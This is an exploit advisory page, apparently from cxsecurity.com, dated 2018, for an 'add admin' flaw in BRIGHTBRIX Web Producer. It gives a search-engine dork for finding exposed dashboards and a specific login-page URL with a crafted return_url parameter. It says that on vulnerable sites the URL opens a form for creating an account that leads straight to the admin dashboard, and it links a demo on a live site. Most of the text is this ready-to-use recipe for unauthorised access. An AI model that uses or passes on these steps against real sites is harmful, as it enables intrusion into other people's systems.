BRIGHTBRIX® Web Producer - Extending the Internet Add Admin Vulnerability

2018.09.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================================================================== Exploit Title : BRIGHTBRIX® Web Producer - Extending the Internet Add Admin Vulnerability Author : Zaenal Arifin Exploit Date : September 06, 2018 Software : https://www.brightbrix.com/ Vendor : https://www.brightbrix.com/ Version : - Home : www.bandungdigitalsecurity.org Tested on : Windows 7/10 64x - BackBox Linux 5.0 64x Exploit Risk : Medium ====================================================================================== Proof of Concept : Search in google browser or another browser and use the dork : Dashboard for BRIGHTBRIX® Web Producer - Extending the Internet and us ur brain to develop this dork. and Use Exploit : /user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen If vuln then you will find a form to create a new account and fill in the active e-mail, and check your e-mail for activation of the code and creat ur password, if it is then it will go directly to the dashboard page. Proof : > https://image.ibb.co/jCa2je/Pwnd.png Demo : https://www.brightbrix.com/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen =========================================== Contact Me : https://www.facebook.com/darkvenom.gov zaenalarifin.net@gmail.com =========================================== ====================================================================================== Special Thanks to : Familly Team_CC | AnonGhost | MilWorm | TeaMp0is0N | Fallaga Team ======================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top